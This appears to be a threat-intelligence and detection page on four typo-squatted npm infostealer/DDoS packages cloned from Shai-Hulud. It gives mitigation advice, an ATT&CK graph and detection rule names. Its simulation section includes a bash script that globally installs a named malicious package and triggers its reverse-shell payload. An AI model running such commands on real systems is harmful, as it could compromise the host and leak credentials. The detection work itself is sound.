Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Researchers uncovered four malicious npm packages that combine infostealer functionality with distributed denial-of-service capabilities. These packages impersonate popular libraries through typo-squatting and include the open-source Shai-Hulud code modified to use attacker-controlled command-and-control servers. Installing any of the packages can result in theft of credentials, exfiltration of cloud secrets, and in one case, enrollment of the infected host into a DDoS botnet. The findings underscore the growing supply-chain risk within the npm ecosystem.
Investigation
Analysts compared the chalk-tempalte package to the leaked Shai-Hulud source code and found it to be an almost exact, unobfuscated copy configured with a custom command-and-control endpoint. The remaining packages transmitted stolen data to separate malicious domains or to an IP address over port 2222, while one variant also deployed a Go-based local bot service used for DDoS activity. All four packages were published by the same npm account, strengthening the link between them.
Mitigation
Organizations should immediately remove the malicious packages from any projects and delete associated configuration artifacts from developer environments and build systems. All credentials that may have been exposed should be rotated, and network access to the identified malicious domains and IP address should be blocked. Teams should also monitor npm dependencies for typo-squatted packages that mimic the same legitimate libraries.
Response
Defenders should create detections for outbound connections to the identified command-and-control domains and IP address, alert on installation of the four malicious package names, and scan systems for the embedded public key tied to the malware. Any system that installed one of the packages should undergo forensic review to determine whether persistent services, scheduled tasks, or additional payloads were deployed.
"graph TB %% Class definitions classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Nodes initial_access["<b>Technique</b> – <b>T1195.002 Supply Chain Compromise</b><br/>Compromise software supply chain to gain initial foothold."] class initial_access technique automated_collection["<b>Technique</b> – <b>T1119 Automated Collection</b><br/>Collect credentials, environment variables, cloud configuration files automatically."] class automated_collection technique creds_in_files["<b>Technique</b> – <b>T1552.001 Unsecured Credentials</b><br/>Credentials stored in files are harvested."] class creds_in_files technique private_keys["<b>Technique</b> – <b>T1552.004 Unsecured Credentials</b><br/>Private keys are extracted from insecure locations."] class private_keys technique victim_identity["<b>Technique</b> – <b>T1589 Gather Victim Identity Information</b><br/>Collect personal identifiers of the victim."] class victim_identity technique victim_org["<b>Technique</b> – <b>T1591.001 Gather Victim Org Information</b><br/>Determine physical locations of the victim organization."] class victim_org technique code_repos["<b>Technique</b> – <b>T1213.003 Data from Information Repositories</b><br/>Harvest code repositories for useful data."] class code_repos technique npm_persistence["<b>Technique</b> – <b>T1176 Software Extensions</b><br/>Establish persistence via malicious npm package."] class npm_persistence technique exfil_over_http["<b>Technique</b> – <b>T1011 Exfiltration Over Other Network Medium</b><br/>Send collected data to C2 over HTTP/HTTPS."] class exfil_over_http technique cloud_transfer["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/>Move stolen data into a cloud storage account."] class cloud_transfer technique %% Connections initial_access –>|leads_to| automated_collection automated_collection –>|collects| creds_in_files automated_collection –>|collects| private_keys automated_collection –>|collects| victim_identity automated_collection –>|collects| victim_org automated_collection –>|collects| code_repos automated_collection –>|collects| npm_persistence creds_in_files –>|exfiltrates| exfil_over_http private_keys –>|exfiltrates| exfil_over_http victim_identity –>|exfiltrates| exfil_over_http victim_org –>|exfiltrates| exfil_over_http code_repos –>|exfiltrates| exfil_over_http npm_persistence –>|exfiltrates| exfil_over_http exfil_over_http –>|stores_in| cloud_transfer "
Attack Flow
Detections
Suspicious Executable Download (via proxy)
View
Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [MACOS] (via file_event)
View
Remote File Upload / Download via Standard Tools (via cmdline)
View
Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [LINUX] (via file_event)
View
Hidden File Was Created On Linux Host (via file_event)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Possible Schtasks or AT Usage for Persistence (via cmdline)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible IP Lookup Domain Communications Attempted (via dns)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
Possible Crontab Usage for Direct Execution (via cmdline)
View
IOCs (SourceIP) to detect: New Actors Deploy Shai-Hulud Clones: TeamPCP Copycats Are Here
View
IOCs (DestinationIP) to detect: New Actors Deploy Shai-Hulud Clones: TeamPCP Copycats Are Here
View
Detection of Outbound Network Connections to Shai-Hulud C2 Servers [Firewall]
View
Detection of Malicious NPM Package Execution [Windows Process Creation]
View
Detection of Malicious npm Package Execution [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Initial Recon (optional): The attacker enumerates the victim’s Node.js environment to confirm
npmis present. - Malicious Package Acquisition: The attacker downloads a malicious npm package that mimics a legitimate utility (e.g.,
@deadcode09284814/axios-util). - Installation & Execution: Using a single line, the attacker installs the package globally and immediately executes a JavaScript payload that opens a reverse shell.
- Persistence (beyond scope): The attacker could add the malicious package to
package.jsonfor future re‑use.
- Initial Recon (optional): The attacker enumerates the victim’s Node.js environment to confirm
-
Regression Test Script: The script reproduces steps 2‑3 exactly, generating the command line strings that the Sigma rule matches.
# malicious_npm_execution.sh # ------------------------------------------------- # 1️⃣ Ensure Node.js runtime is present if ! command -v node >/dev/null 2>&1; then echo "[*] Installing Node.js and npm" sudo apt‑update && sudo apt‑install -y nodejs npm fi # 2️⃣ Install the malicious npm package (simulated) # (Replace with a real malicious package in a real test) MALICIOUS_PKG="@deadcode09284814/axios-util" echo "[*] Installing malicious package: $MALICIOUS_PKG" npm install -g "$MALICIOUS_PKG" # 3️⃣ Execute a payload that the package ships with # Here we simply require the package; the package's postinstall # script will run the attacker’s code. echo "[*] Triggering malicious payload" node -e "require('$MALICIOUS_PKG');" # 4️⃣ Optional: Keep the shell alive for observation sleep 30 echo "[*] Test completed" # ------------------------------------------------- -
Cleanup Commands: Remove the malicious package and any generated files.
# cleanup_malicious_npm.sh # ------------------------------------------------- echo "[*] Removing malicious npm package" npm uninstall -g "@deadcode09284814/axios-util" || true # Remove any residual node_modules from the home directory rm -rf "$HOME/.npm/_cacache" echo "[*] Cleanup complete" # -------------------------------------------------